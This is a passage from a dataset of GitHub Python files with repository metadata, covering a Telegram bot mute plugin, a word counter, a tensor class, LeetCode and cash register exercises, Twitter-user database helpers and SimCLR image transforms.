user_id, until)\n if muted:\n member = (await self.parse_member(user_id)).first_name\n await message.reply_text(await self.bot.text(chat_id, tr_string, member, timeflag))\n\n @listener.on(\"unmute\", can_restrict=True)\n async def unmute(self, message):\n \"\"\"Unmute chat member\"\"\"\n user, _ = extract_user_and_text(message)\n if user is None:\n return await message.reply_text(await self.bot.text(message.chat.id, \"no-mute-user\"))\n member = await message.chat.get_member(user)\n if member.can_send_messages is False:\n await message.chat.unban_member(user)\n await message.reply_text(await self.bot.text(message.chat.id, \"unmute-done\"))\n else:\n await message.reply_text(await self.bot.text(message.chat.id, \"user-not-muted\"))\n","repo_name":"Keys-007/TelegramGroupBot","sub_path":"telegram_bot/plugins/muting.py","file_name":"muting.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72892217128","text":"# encoding: utf-8\n# Project & File: - \n# Author: aojie654\n# Create Time: 2018.07.10 10:33\n\n\ndef get_text():\n file = open('./hamlet.txt', 'r').read()\n file = file.lower()\n for ch in '!\"#$%&()*+,-./:;<=>?@[\\\\]^_`{|}~':\n file = file.replace(ch, \" \")\n return file\n\n\nhamlet_txt = get_text()\nwords = hamlet_txt.split()\ncounts = {}\nfor word in words:\n counts[word] = counts.get(word, 0) + 1\nitems = list(counts.items())\nitems.sort(key=lambda x: x[1], reverse=True)\nfor i in range(10):\n word, count = items[i]\n print('{0:<10},{1:>5}'.format(word, count))\n","repo_name":"aojie654/codes_store","sub_path":"python/python/songTian/part0_base/week09/t901_final/t005_word_count.py","file_name":"t005_word_count.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39296616218","text":"from turtle import speed\n\nfrom stem import DownloadFailed\nimport speedtest\nst = speedtest.speedtest()\noption = int(input(\"\"\"what is your internet Speed: \n1) Download speed\n2) Upload speed\n3) ping \"\"\"))\n\nif option == 1:\n print(st.download())\nelif option == 2:\n print(st.upload())\nelif option == 3:\n servernames=[]\n st.get_servers(servernames)\n print(st.results.ping) \nelse:\n print(\"Enter your Option: \")\n","repo_name":"rohitrepo1/Python","sub_path":"FUNWITHPYTHON/speedtest.py","file_name":"speedtest.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34780445047","text":"'''\nBase code from pytensor: the python implementation of MATLAB based tensor code\nhttps://code.google.com/p/pytensor\n\nThe regular, dense tensor object.\nThe code is the python implementation of the @tensor folder in the MATLAB Tensor Toolbox\n'''\nimport numpy;\nimport sptensor;\nimport tools;\nimport khatrirao;\n\nclass tensor:\n data = None;\n shape = None;\n \n def __init__(self, data, shape = None):\n \"\"\"Constructor for tensor object.\n data can be numpy.array or list.\n shape can be numpy.array, list, tuple of integers\"\"\"\n if(data.__class__ == list):\n data = numpy.array(data);\n\n if(shape != None):\n if(len(shape) == 0):\n raise ValueError(\"Second argument must be a row vector.\");\n \n if(shape.__class__ == numpy.ndarray):\n if(shape.ndim != 2 and shape[0].size != 1):\n raise ValueError(\"Second argument must be a row vector.\");\n shape = tuple(shape);\n else:\n shape = tuple(data.shape);\n \n\n if (len(shape) == 0):\n if (data.size != 0):\n raise ValueError(\"Empty tensor cannot contain any elements\");\n \n elif (tools.prod(shape) != data.size):\n raise ValueError(\"Size of data does not match specified size of tensor\");\n \n self.shape = shape;\n self.data = data.reshape(self.shape, order='F');\n \n def size(self):\n \"\"\"returns the number of elements in the tensor\"\"\"\n ret = 1;\n for i in range(0, len(self.shape)):\n ret = ret * self.shape(i);\n return ret;\n \n def __str__(self):\n str = \"tensor of size {0}\\n\".format(self.shape);\n str += self.data.__str__();\n return str;\n\n def copy(self):\n \"\"\" returns the deepcopy of tensor object.\"\"\"\n return tensor(self.data.copy(), self.shape);\n\n def dimsize(self, ind):\n \"\"\" returns the size of the specified dimension.\n Same as shape[ind].\"\"\"\n return self.shape[ind];\n \n def mttkrp(self, U, n):\n \"\"\" Matricized tensor times Khatri-Rao product for tensor.\n \n Calculates the matrix product of the n-mode matricization of X with\n the Khatri-Rao product of all entries in U except the nth.\n \n Parameters\n ----------\n U - factorization\n\n Returns\n -------\n out : Khatri-Rao product as a numpy array\n \"\"\"\n N = self.ndims()\n if len(U) != N:\n raise ValueError(\"U has the wrong length\");\n \n Xn = self.permute(numpy.concatenate(([n], numpy.arange(0, n), numpy.arange(n+1, N))))\n ## use the Fortran ordering system to maintain consistent with Matlab code\n Xn = Xn.data.reshape(self.dimsize(n), numpy.prod(self.shape)/self.dimsize(n), order='F');\n Z = khatrirao.khatrirao_array([U[i] for i in range(len(U)) if i != n], reverse=True);\n V = numpy.dot(Xn,Z);\n return V;\n \n def ndims(self):\n \"\"\" returns the number of dimensions. \"\"\"\n return len(self.shape);\n\n def norm(self):\n \"\"\" returns the Frobenius norm of the tensor.\"\"\"\n return numpy.linalg.norm(self.data.flatten());\n \n def tosptensor(self):\n \"\"\" returns the sptensor object\n that contains the same value with the tensor object.\"\"\"\n nnz = numpy.nonzero(self.data)\n vals = self.data[nnz]\n totVals = len(vals)\n vals = numpy.reshape(vals, (totVals, 1))\n subs = numpy.zeros((totVals, self.ndims()))\n subs.dtype = 'int'\n for n in range(self.ndims()):\n subs[:, n] = nnz[n]\n return sptensor.sptensor(subs, vals, self.shape)\n # for n in range(len(nnz)):\n # length = len(self.shape);\n # sub = tools.allIndices(self.shape);\n # return sptensor.sptensor(\n # sub,\n # self.data.flatten().reshape(self.data.size, 1),\n # self.shape);\n\n def permute(self, order):\n \"\"\" returns a tensor permuted by the order specified. \"\"\"\n if (order.__class__ == list):\n order = numpy.array(order);\n \n if(self.ndims() != len(order)):\n raise ValueError(\"Invalid permutation order\");\n \n sortedorder = order.copy();\n sortedorder.sort();\n \n if not ((sortedorder == numpy.arange(self.data.ndim)).all()):\n raise ValueError(\"Invalid permutation order\");\n \n neworder = numpy.arange(len(order)).tolist();\n newshape = list(self.shape);\n newdata = self.data.copy();\n\n for i in range(0,len(order)-1):\n index = tools.find(neworder, order[i]);\n newdata = newdata.swapaxes(i,index);\n \n temp = newshape[i];\n newshape[i] = newshape[index];\n newshape[index] = temp;\n temp = neworder[i];\n neworder[i] = neworder[index];\n neworder[index] = temp;\n \n newshape = tuple(newshape);\n return tensor(newdata,newshape);\n \n def ipermute(self, order):\n \"\"\" returns a tensor permuted by the inverse of the order specified. \"\"\"\n #calculate the inverse of iorder\n iorder = [];\n for i in range(0, len(order)):\n iorder.extend([tools.find(order, i)]);\n \n #returns the permuted tensor by the inverse\n return self.permute(iorder);\n \n\n def ttm(self, mat, dims = None, option = None):\n \"\"\" computes the tensor times the given matrix.\n arrs is a single 2-D matrix/array or a list of those matrices/arrays.\"\"\"\n \n if(dims == None):\n dims = range(0,self.ndims());\n \n #Handle when arrs is a list of arrays\n if(mat.__class__ == list):\n if(len(mat) == 0):\n raise ValueError(\"the given list of arrays is empty!\");\n \n (dims,vidx) = tools.tt_dimscehck(dims, self.ndims(), len(mat));\n \n Y = self.ttm(mat[vidx[0]],dims[0],option);\n for i in range(1, len(dims)):\n Y = Y.ttm(mat[vidx[i]],dims[i],option);\n \n return Y; \n \n if(mat.ndim != 2):\n raise ValueError (\"matrix in 2nd armuent must be a matrix!\");\n \n if(dims.__class__ == list):\n if(len(dims) != 1):\n raise ValueError(\"Error in number of elements in dims\");\n else:\n dims = dims[0];\n \n if(dims < 0 or dims > self.ndims()):\n raise ValueError (\"Dimension N must be between 1 and num of dimensions\");\n \n \n #Compute the product\n \n N = self.ndims();\n shp = self.shape;\n order = []\n order.extend([dims]);\n order.extend(range(0,dims));\n order.extend(range(dims+1,N));\n \n newdata = self.permute(order).data;\n newdata = newdata.reshape(shp[dims], tools.prod(shp)/shp[dims]);\n if(option == None):\n newdata = numpy.dot(mat, newdata);\n p = mat.shape[0];\n elif(option == 't'):\n newdata = numpy.dot(mat.transpose(), newdata);\n p = mat.shape[1];\n else:\n raise ValueError(\"Unknown option\");\n \n newshp = [p];\n newshp.extend(tools.getelts(shp,range(0,dims)));\n newshp.extend(tools.getelts(shp,range(dims+1,N)));\n \n Y = tensor(newdata, newshp);\n Y = Y.ipermute(order);\n return Y;\n \n def ttv(self, v, dims):\n \"\"\" Tensor times vector\n \n Parameters\n ----------\n v - column vector \n d - dimensions\n\n Returns\n -------\n out : Khatri-Rao product as a numpy array\n \"\"\"\n (dims,vidx) = tools.tt_dimscheck(dims, self.ndims(), len(v));\n remdims = numpy.setdiff1d(range(self.ndims()), dims);\n if self.ndims() > 1:\n c = self.permute(numpy.concatenate((remdims, dims))).data;\n \n n = self.ndims()-1;\n sz = numpy.array(self.shape)[numpy.concatenate((remdims, dims))]\n for i in range(len(dims)-1, -1, -1):\n c = c.reshape(numpy.prod(sz[0:n]), sz[n], order='F')\n c = numpy.dot(c, v[vidx[i]]);\n n = n-1;\n \n if n > 0:\n c = tensor.tensor(c, sz[0:n]);\n else:\n c = c[0];\n \n return c;\n \n def tondarray(self):\n \"\"\"return an ndarray that contains the data of the tensor\"\"\"\n return self.data;\n \n\n\n\n\n\n\n\n\n\n\n\n\n # Math, logic operators\n def __add__(self, other):\n return self.funwrap(other, \"add\");\n def __sub__(self, other):\n return self.funwrap(other, \"sub\");\n def __mul__(self, other):\n return self.funwrap(other, \"mul\");\n def __eq__(self, other):\n return self.funwrap(other, \"eq\");\n def __ne__(self, other):\n return self.funwrap(other, \"ne\");\n def __lt__(self, other):\n return self.funwrap(other, \"lt\");\n def __gt__(self, other):\n return self.funwrap(other, \"gt\");\n def __le__(self, other):\n return self.funwrap(other, \"le\");\n def __ge__(self, other):\n return self.funwrap(other, \"ge\");\n def funwrap(self, other, fun):\n \"\"\"rwaper function for logical operators\"\"\"\n if(other.__class__ == tensor):\n if(self.shape != other.shape):\n raise ValueError(\"Shapes of the tensors do not match\");\n \n if(fun == \"add\"):\n return tensor(self.data.__add__(other.data), self.shape);\n elif(fun == \"sub\"):\n return tensor(self.data.__sub__(other.data), self.shape);\n elif(fun == \"mul\"):\n raise ValueError(\"Use ttt() instead.\");\n elif(fun == \"eq\"):\n return tensor(self.data.__eq__(other.data), self.shape);\n elif(fun == \"ne\"):\n return tensor(self.data.__ne__(other.data), self.shape);\n elif(fun == \"gt\"):\n return tensor(self.data.__gt__(other.data), self.shape);\n elif(fun == \"ge\"):\n return tensor(self.data.__ge__(other.data), self.shape);\n elif(fun == \"lt\"):\n return tensor(self.data.__lt__(other.data), self.shape);\n elif(fun == \"le\"):\n return tensor(self.data.__le__(other.data), self.shape);\n else:\n raise ValueError(\"Unknown function\");\n else:\n if(fun == \"add\"):\n return tensor(self.data.__add__(other), self.shape);\n elif(fun == \"sub\"):\n return tensor(self.data.__sub__(other), self.shape);\n elif(fun == \"mul\"):\n return tensor(self.data.__mul__(other), self.shape);\n elif(fun == \"eq\"):\n return tensor(self.data.__eq__(other), self.shape);\n elif(fun == \"ne\"):\n return tensor(self.data.__ne__(other), self.shape);\n elif(fun == \"gt\"):\n return tensor(self.data.__gt__(other), self.shape);\n elif(fun == \"ge\"):\n return tensor(self.data.__ge__(other), self.shape);\n elif(fun == \"lt\"):\n return tensor(self.data.__lt__(other), self.shape);\n elif(fun == \"le\"):\n return tensor(self.data.__le__(other), self.shape);\n else:\n raise ValueError(\"Unknown function\");\n\n def __pos__(self):\n pass; #do nothing\n def __neg__(self):\n return tensor(self.data * -1, self.shape);\n \n \n #Special Constructors\ndef tenzeros(shp):\n \"\"\"special constructor, construct a tensor with the shape filled with 0\"\"\"\n data = numpy.ndarray(shp);\n data.fill(0);\n return tensor(data, shp);\ndef tenones(shp):\n \"\"\"special constructor, construct a tensor with the shape filled with 1\"\"\"\n data = numpy.ndarray(shp);\n data.fill(1);\n return tensor(data, shp);\ndef tenrands(shp):\n \"\"\"special constructor, construct a tensor with the shape filled with random number between 0 and 1\"\"\"\n data = numpy.random.random(shp);\n return tensor(data, shp);\ndef tendiag(vals, shape=None):\n \"\"\"special constructor, construc a tensor with the values in the diagonal\"\"\"\n \n #if shape is None or\n #number of dimensions of shape is less than the number of values given\n if (shape == None or len(shape) < len(vals)):\n shape = [len(vals)]*len(vals);\n else:\n shape = list(shape);\n for i in range(0, len(vals)):\n if(shape[i] < len(vals)):\n shape[i] = len(vals);\n \n data = numpy.ndarray(shape);\n data.fill(0);\n \n # put the values in the ndarray\n for i in range(0, len(vals)):\n data.put(tools.sub2ind(shape,[i]*len(shape)), vals[i]);\n return tensor(data, shape); \n ","repo_name":"aschein/tensor_analysis","sub_path":"test_joyce_code/tensor.py","file_name":"tensor.py","file_ext":"py","file_size_in_byte":12958,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27234454469","text":"# 12. Integer to Roman\n# \n# Roman numerals are represented by seven different symbols: I, V, X, L, C, D and M.\n# \n# Symbol Value\n# I 1\n# V 5\n# X 10\n# L 50\n# C 100\n# D 500\n# M 1000\n# \n# For example, two is written as II in Roman numeral, just two one's added together. \n# Twelve is written as, XII, which is simply X + II. The number twenty seven is \n# written as XXVII, which is XX + V + II.\n# \n# Roman numerals are usually written largest to smallest from left to right. However, \n# the numeral for four is not IIII. Instead, the number four is written as IV. \n# Because the one is before the five we subtract it making four. The same principle \n# applies to the number nine, which is written as IX. There are six instances where \n# subtraction is used:\n# \n# I can be placed before V (5) and X (10) to make 4 and 9. \n# X can be placed before L (50) and C (100) to make 40 and 90. \n# C can be placed before D (500) and M (1000) to make 400 and 900.\n# \n# Given an integer, convert it to a roman numeral. Input is guaranteed to be within \n# the range from 1 to 3999.\n# \n# Example 1:\n# \n# Input: 3\n# Output: \"III\"\n# \n# Example 2:\n# \n# Input: 4\n# Output: \"IV\"\n# \n# Example 3:\n# \n# Input: 9\n# Output: \"IX\"\n# \n# Example 4:\n# \n# Input: 58\n# Output: \"LVIII\"\n# Explanation: C = 100, L = 50, XXX = 30 and III = 3.\n# \n# Example 5:\n# \n# Input: 1994\n# Output: \"MCMXCIV\"\n# Explanation: M = 1000, CM = 900, XC = 90 and IV = 4.\n#\n# Companies asking this question: Twitter\n\nclass Solution(object):\n def intToRoman(self, num):\n \"\"\"\n :type num: int\n :rtype: str\n \"\"\"\n if num < 1 or num > 3999:\n return 'Invalid input'\n\n romansList = [\n [1000, 'M'],\n [900, 'CM'],\n [500, 'D'],\n [400, 'CD'],\n [100, 'C'],\n [90, 'XC'],\n [50, 'L'],\n [40, 'XL'],\n [10, 'X'],\n [9, 'IX'],\n [5, 'V'],\n [4, 'IV'],\n [1, 'I']\n ]\n\n roman = ''\n it = (x for x in romansList)\n while num != 0:\n integerValue, romanDigit = next(it)\n placeValue = (num / integerValue) * integerValue\n while placeValue > 0:\n roman += romanDigit\n placeValue -= integerValue\n num -= (num / integerValue) * integerValue\n\n return roman\n\n def intToRoman_recursive(self, num):\n if(num >= 1000):\n return 'M' + self.intToRoman_recursive(num - 1000)\n if(num >= 900):\n return 'CM' + self.intToRoman_recursive(num - 900)\n if(num >= 500):\n return 'D' + self.intToRoman_recursive(num - 500)\n if(num >= 400):\n return 'CD' + self.intToRoman_recursive(num - 400)\n if(num >= 100):\n return 'C' + self.intToRoman_recursive(num - 100)\n if(num >= 90):\n return 'XC' + self.intToRoman_recursive(num - 90)\n if(num >= 50):\n return 'L' + self.intToRoman_recursive(num - 50)\n if(num >= 40):\n return 'XL' + self.intToRoman_recursive(num - 40)\n if(num >= 10):\n return 'X' + self.intToRoman_recursive(num - 10)\n if(num >= 9):\n return 'IX' + self.intToRoman_recursive(num - 9)\n if(num >= 5):\n return 'V' + self.intToRoman_recursive(num - 5)\n if(num >= 4):\n return 'IV' + self.intToRoman_recursive(num - 4)\n if(num >= 1):\n return 'I' + self.intToRoman_recursive(num - 1)\n return ''\n\n\ndef test():\n print('Testing intToRoman(self, num)...\\n')\n\n s = Solution()\n\n num = 3003\n result = s.intToRoman(num)\n print('Expected: MMMIII')\n print('Output: ' + result + '\\n')\n\n num = 3\n result = s.intToRoman(num)\n print('Expected: III')\n print('Output: ' + result + '\\n')\n\n num = 4\n result = s.intToRoman(num)\n print('Expected: IV')\n print('Output: ' + result + '\\n')\n\n num = 9\n result = s.intToRoman(num)\n print('Expected: IX')\n print('Output: ' + result + '\\n')\n\n num = 58\n result = s.intToRoman(num)\n print('Expected: LVIII')\n print('Output: ' + result + '\\n')\n\n num = 1994\n result = s.intToRoman(num)\n print('Expected: MCMXCIV')\n print('Output: ' + result + '\\n')\n\ndef test_recursive():\n print('Testing intToRoman_recursive(self, num)...\\n')\n\n s = Solution()\n\n num = 3003\n result = s.intToRoman_recursive(num)\n print('Expected: MMMIII')\n print('Output: ' + result + '\\n')\n\n num = 3\n result = s.intToRoman_recursive(num)\n print('Expected: III')\n print('Output: ' + result + '\\n')\n\n num = 4\n result = s.intToRoman_recursive(num)\n print('Expected: IV')\n print('Output: ' + result + '\\n')\n\n num = 9\n result = s.intToRoman_recursive(num)\n print('Expected: IX')\n print('Output: ' + result + '\\n')\n\n num = 58\n result = s.intToRoman_recursive(num)\n print('Expected: LVIII')\n print('Output: ' + result + '\\n')\n\n num = 1994\n result = s.intToRoman_recursive(num)\n print('Expected: MCMXCIV')\n print('Output: ' + result + '\\n')\n\ntest()\ntest_recursive()","repo_name":"cbrodeur0818/coding-challenges","sub_path":"LeetCode/solutions/012M_integer_to_roman/012M_integer_to_roman.py","file_name":"012M_integer_to_roman.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33824174304","text":"# JavaScript Algorithms and Data Structures Projects: Cash Register\n#\n# Design a cash register drawer function checkCashRegister() that accepts purchase price as the first\n# argument (price), payment as the second argument (cash), and cash-in-drawer (cid) as the third argument.\n# cid is a 2D array listing available currency. The checkCashRegister() function should always return an\n# object with a status key and a change key. Return {status: \"INSUFFICIENT_FUNDS\", change: []} if cash-in-drawer\n# is less than the change due, or if you cannot return the exact change. Return {status: \"CLOSED\", change: [...]}\n# with cash-in-drawer as the value for the key change if it is equal to the change due. Otherwise, return\n# {status: \"OPEN\", change: [...]}, with the change due in coins and bills, sorted in highest to lowest order,\n# as the value of the change key.\n#\n# checkCashRegister(price, cash, cid) ➞ obj\n\n\ndef checkCashRegister(price, cash, cid):\n val = [100, 20, 10, 5, 1, 0.25, 0.1, 0.05, 0.01]\n coh = cid[::-1]\n dif = cash - price\n emp = dif == sum([d[1] for d in coh])\n due = []\n for i in range(len(coh)):\n if dif > val[i] and coh[i][1] != 0:\n cnt = 0\n while coh[i][1] > 0 and dif - val[i] >= 0:\n cnt += val[i]\n coh[i][1] -= val[i]\n dif = round(dif - val[i], 2)\n due.append([coh[i][0], cnt])\n return (\n {\"status\": \"INSUFFICIENT_FUNDS\", \"change\": []}\n if dif > 0\n else {\"status\": \"CLOSED\", \"change\": cid}\n if emp\n else {\"status\": \"OPEN\", \"change\": due}\n )\n\n\nprint(\n checkCashRegister(\n 190.5,\n 500,\n [\n [\"PENNY\", 1.01],\n [\"NICKEL\", 2.05],\n [\"DIME\", 3.1],\n [\"QUARTER\", 4.25],\n [\"ONE\", 90],\n [\"FIVE\", 55],\n [\"TEN\", 20],\n [\"TWENTY\", 60],\n [\"ONE HUNDRED\", 100],\n ],\n )\n)\n# ➞ an object\nprint(\n checkCashRegister(\n 19.5,\n 20,\n [\n [\"PENNY\", 1.01],\n [\"NICKEL\", 2.05],\n [\"DIME\", 3.1],\n [\"QUARTER\", 4.25],\n [\"ONE\", 90],\n [\"FIVE\", 55],\n [\"TEN\", 20],\n [\"TWENTY\", 60],\n [\"ONE HUNDRED\", 100],\n ],\n )\n)\n# ➞ {status: \"OPEN\", change: [[\"QUARTER\", 0.5]]}\nprint(\n checkCashRegister(\n 3.26,\n 100,\n [\n [\"PENNY\", 1.01],\n [\"NICKEL\", 2.05],\n [\"DIME\", 3.1],\n [\"QUARTER\", 4.25],\n [\"ONE\", 90],\n [\"FIVE\", 55],\n [\"TEN\", 20],\n [\"TWENTY\", 60],\n [\"ONE HUNDRED\", 100],\n ],\n )\n)\n# ➞ {status: \"OPEN\", change: [[\"TWENTY\", 60], [\"TEN\", 20],\n# [\"FIVE\", 15], [\"ONE\", 1], [\"QUARTER\", 0.5], [\"DIME\", 0.2],\n# [\"PENNY\", 0.04]]}\nprint(\n checkCashRegister(\n 19.5,\n 20,\n [\n [\"PENNY\", 0.01],\n [\"NICKEL\", 0],\n [\"DIME\", 0],\n [\"QUARTER\", 0],\n [\"ONE\", 0],\n [\"FIVE\", 0],\n [\"TEN\", 0],\n [\"TWENTY\", 0],\n [\"ONE HUNDRED\", 0],\n ],\n )\n)\n# ➞ {status: \"INSUFFICIENT_FUNDS\", change: []}\nprint(\n checkCashRegister(\n 19.5,\n 20,\n [\n [\"PENNY\", 0.01],\n [\"NICKEL\", 0],\n [\"DIME\", 0],\n [\"QUARTER\", 0],\n [\"ONE\", 1],\n [\"FIVE\", 0],\n [\"TEN\", 0],\n [\"TWENTY\", 0],\n [\"ONE HUNDRED\", 0],\n ],\n )\n)\n# ➞ {status: \"INSUFFICIENT_FUNDS\", change: []}\nprint(\n checkCashRegister(\n 19.5,\n 20,\n [\n [\"PENNY\", 0.5],\n [\"NICKEL\", 0],\n [\"DIME\", 0],\n [\"QUARTER\", 0],\n [\"ONE\", 0],\n [\"FIVE\", 0],\n [\"TEN\", 0],\n [\"TWENTY\", 0],\n [\"ONE HUNDRED\", 0],\n ],\n )\n)\n# ➞ {status: \"CLOSED\", change: [[\"PENNY\", 0.5], [\"NICKEL\", 0],\n# [\"DIME\", 0], [\"QUARTER\", 0], [\"ONE\", 0], [\"FIVE\", 0],\n# [\"TEN\", 0], [\"TWENTY\", 0], [\"ONE HUNDRED\", 0]]}\n","repo_name":"anthonyBosek/py-gorithms","sub_path":"projectAlgorithms/+Cash Register/cash_register.py","file_name":"cash_register.py","file_ext":"py","file_size_in_byte":4104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10111821569","text":"# -*- coding: utf-8 -*-\nfrom collections import OrderedDict\nfrom db.connection import get_connection\n\n__author__ = 'goran'\n\ndef get_friends():\n db = get_connection()\n cursor = db.cursor()\n\n friends = {}\n\n sql = \"\"\"select * from friend\"\"\"\n\n cursor.execute(sql)\n\n for (iduser, idfriend) in cursor:\n friends.setdefault(iduser, set())\n friends[iduser].add(idfriend)\n\n cursor.close()\n db.close()\n\n return friends\n\n\ndef get_followers():\n db = get_connection()\n cursor = db.cursor()\n\n followers = {}\n\n sql = \"\"\"select * from follower\"\"\"\n\n cursor.execute(sql)\n\n for (iduser, idfollower) in cursor:\n followers.setdefault(iduser, set())\n followers[iduser].add(idfollower)\n\n cursor.close()\n db.close()\n\n return followers\n\n\ndef get_clusters_from_db():\n db = get_connection()\n cursor = db.cursor()\n\n sql = \"\"\"select screenname, cluster from user\"\"\"\n\n cursor.execute(sql)\n\n clusters = {}\n\n for (screen_name, cluster) in cursor:\n clusters.setdefault(cluster, [])\n clusters[cluster].append(screen_name)\n\n idx = 1\n ordered_clusters = OrderedDict()\n for cluster, users in clusters.iteritems():\n ordered_clusters['Cluster ' + str(idx)] = users\n idx += 1\n\n return ordered_clusters\n\n\ndef get_all_users():\n db = get_connection()\n cursor = db.cursor()\n sql = \"\"\"select iduser from user\"\"\"\n cursor.execute(sql)\n\n users = [u[0] for u in cursor]\n\n return set(users)\n\n\ndef get_all_friends():\n db = get_connection()\n cursor = db.cursor()\n sql = \"\"\"select distinct idfriend from friend\"\"\"\n cursor.execute(sql)\n\n users = [u[0] for u in cursor]\n\n return set(users)\n\n\ndef get_all_followers():\n db = get_connection()\n cursor = db.cursor()\n sql = \"\"\"select distinct idfollower from follower\"\"\"\n cursor.execute(sql)\n\n users = [u[0] for u in cursor]\n\n return set(users)\n\n\ndef get_inv_friends():\n all_users = get_all_users()\n db = get_connection()\n cursor = db.cursor()\n\n users_friends_count = {}\n\n sql = \"\"\"select f.idfriend, count(*) from friend f group by f.idfriend\"\"\"\n\n cursor.execute(sql)\n\n for record in cursor:\n if record[0] not in all_users:\n users_friends_count[record[0]] = int(record[1])\n\n return users_friends_count\n\n\ndef get_inv_followers():\n all_users = get_all_users()\n db = get_connection()\n cursor = db.cursor()\n\n user_followers_count = {}\n\n sql = \"\"\"select f.idfollower, count(*) from follower f group by f.idfollower\"\"\"\n\n cursor.execute(sql)\n\n for record in cursor:\n if record[0] not in all_users:\n user_followers_count[record[0]] = int(record[1])\n\n return user_followers_count\n\n\n","repo_name":"goraniliev/TwitterUsersClustering","sub_path":"db/get_utilities.py","file_name":"get_utilities.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33367409611","text":"import numpy as np\n\nfrom pl_bolts.utils import _OPENCV_AVAILABLE, _TORCHVISION_AVAILABLE\nfrom pl_bolts.utils.warnings import warn_missing_pkg\n\nif _TORCHVISION_AVAILABLE:\n from torchvision import transforms as transforms\nelse: # pragma: no cover\n warn_missing_pkg('torchvision')\n\nif _OPENCV_AVAILABLE:\n import cv2\nelse: # pragma: no cover\n warn_missing_pkg('cv2', pypi_name='opencv-python')\n\n\nclass SimCLRTrainDataTransform(object):\n \"\"\"\n Transforms for SimCLR\n\n Transform::\n\n RandomResizedCrop(size=self.input_height)\n RandomHorizontalFlip()\n RandomApply([color_jitter], p=0.8)\n RandomGrayscale(p=0.2)\n GaussianBlur(kernel_size=int(0.1 * self.input_height))\n transforms.ToTensor()\n\n Example::\n\n from pl_bolts.models.self_supervised.simclr.transforms import SimCLRTrainDataTransform\n\n transform = SimCLRTrainDataTransform(input_height=32)\n x = sample()\n (xi, xj) = transform(x)\n \"\"\"\n\n def __init__(\n self, input_height: int = 224, gaussian_blur: bool = True, jitter_strength: float = 1., normalize=None\n ) -> None:\n\n if not _TORCHVISION_AVAILABLE: # pragma: no cover\n raise ModuleNotFoundError('You want to use `transforms` from `torchvision` which is not installed yet.')\n\n self.jitter_strength = jitter_strength\n self.input_height = input_height\n self.gaussian_blur = gaussian_blur\n self.normalize = normalize\n\n self.color_jitter = transforms.ColorJitter(\n 0.8 * self.jitter_strength, 0.8 * self.jitter_strength, 0.8 * self.jitter_strength,\n 0.2 * self.jitter_strength\n )\n\n data_transforms = [\n transforms.RandomResizedCrop(size=self.input_height),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomApply([self.color_jitter], p=0.8),\n transforms.RandomGrayscale(p=0.2)\n ]\n\n if self.gaussian_blur:\n kernel_size = int(0.1 * self.input_height)\n if kernel_size % 2 == 0:\n kernel_size += 1\n\n data_transforms.append(GaussianBlur(kernel_size=kernel_size, p=0.5))\n\n data_transforms = transforms.Compose(data_transforms)\n\n if normalize is None:\n self.final_transform = transforms.ToTensor()\n else:\n self.final_transform = transforms.Compose([transforms.ToTensor(), normalize])\n\n self.train_transform = transforms.Compose([data_transforms, self.final_transform])\n\n # add online train transform of the size of global view\n self.online_transform = transforms.Compose([\n transforms.RandomResizedCrop(self.input_height),\n transforms.RandomHorizontalFlip(), self.final_transform\n ])\n\n def __call__(self, sample):\n transform = self.train_transform\n\n xi = transform(sample)\n xj = transform(sample)\n\n return xi, xj, self.online_transform(sample)\n\n\nclass SimCLREvalDataTransform(SimCLRTrainDataTransform):\n \"\"\"\n Transforms for SimCLR\n\n Transform::\n\n Resize(input_height + 10, interpolation=3)\n transforms.CenterCrop(input_height),\n transforms.ToTensor()\n\n Example::\n\n from pl_bolts.models.self_supervised.simclr.transforms import SimCLREvalDataTransform\n\n transform = SimCLREvalDataTransform(input_height=32)\n x = sample()\n (xi, xj) = transform(x)\n \"\"\"\n\n def __init__(\n self, input_height: int = 224, gaussian_blur: bool = True, jitter_strength: float = 1., normalize=None\n ):\n super().__init__(\n normalize=normalize,\n input_height=input_height,\n gaussian_blur=gaussian_blur,\n jitter_strength=jitter_strength\n )\n\n # replace online transform with eval time transform\n self.online_transform = transforms.Compose([\n transforms.Resize(int(self.input_height + 0.1 * self.input_height)),\n transforms.CenterCrop(self.input_height),\n self.final_transform,\n ])\n\n\nclass SimCLRFinetuneTransform(object):\n\n def __init__(\n self,\n input_height: int = 224,\n jitter_strength: float = 1.,\n normalize=None,\n eval_transform: bool = False\n ) -> None:\n\n self.jitter_strength = jitter_strength\n self.input_height = input_height\n self.normalize = normalize\n\n self.color_jitter = transforms.ColorJitter(\n 0.8 * self.jitter_strength,\n 0.8 * self.jitter_strength,\n 0.8 * self.jitter_strength,\n 0.2 * self.jitter_strength,\n )\n\n if not eval_transform:\n data_transforms = [\n transforms.RandomResizedCrop(size=self.input_height),\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomApply([self.color_jitter], p=0.8),\n transforms.RandomGrayscale(p=0.2)\n ]\n else:\n data_transforms = [\n transforms.Resize(int(self.input_height + 0.1 * self.input_height)),\n transforms.CenterCrop(self.input_height)\n ]\n\n if normalize is None:\n final_transform = transforms.ToTensor()\n else:\n final_transform = transforms.Compose([transforms.ToTensor(), normalize])\n\n data_transforms.append(final_transform)\n self.transform = transforms.Compose(data_transforms)\n\n def __call__(self, sample):\n return self.transform(sample)\n\n\nclass GaussianBlur(object):\n # Implements Gaussian blur as described in the SimCLR paper\n def __init__(self, kernel_size, p=0.5, min=0.1, max=2.0):\n if not _TORCHVISION_AVAILABLE: # pragma: no cover\n raise ModuleNotFoundError('You want to use `GaussianBlur` from `cv2` which is not installed yet.')\n\n self.min = min\n self.max = max\n\n # kernel size is set to be 10% of the 